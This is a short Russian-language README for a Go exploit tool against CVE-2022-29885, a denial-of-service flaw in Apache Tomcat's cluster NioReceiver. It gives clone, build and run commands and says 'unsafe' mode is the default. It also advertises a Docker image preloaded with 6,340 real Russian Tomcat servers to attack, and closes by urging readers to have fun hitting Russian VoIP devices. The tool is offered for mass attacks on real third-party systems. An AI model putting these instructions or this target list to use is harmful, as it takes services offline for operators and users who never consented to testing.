
Apache Tomcat DoS (CVE-2022-29885) Exploit
Эксплойт для Apache Tomcat DoS (CVE-2022-29885).
Отказ в обслуживании в EncryptInterceptor (кластер Tomcat).
Целевая машина должна запустить Cluster Nio Receiver.
Отправка специального TCP-пакета вызовет отказ в обслуживании цели.
Независимо от того, используется ли EncryptInterceptor или нет, существует возможность уязвимости отказа в обслуживании при условии:
функция кластера Tomcat включена и используется NioReceiver для связи.
Любая версия Tomcat будет уязвима. Единственное решение — использовать доверенную сеть.
Безопасный конфигурационный файл server.xml содержит
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
encryptionAlgorithm="AES/CBC/PKCS5Padding"
encryptionKey="ANY_KEY(LENGTH:32)"/>
Любая другая вариация конфигурации небезопасна.
Приложение
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false
- t - target URL or filename
- d - debug {true, false} flag which enables or disables logs
- s - safe and unsafe regime switcher. Default value is unsafe.
Docker с предопределёнными 6340 российскими серверами Apache Tomcat, размноженными для 10 наиболее распространённых портов Tomcat.
Режим Unsafe установлен по умолчанию.
docker run -d masterroot/cve-2022-29885
Веселитесь с VoIP-устройствами ruzzland-terrorist-state :D

Вы можете связаться со мной через Keybase для получения любых деталей.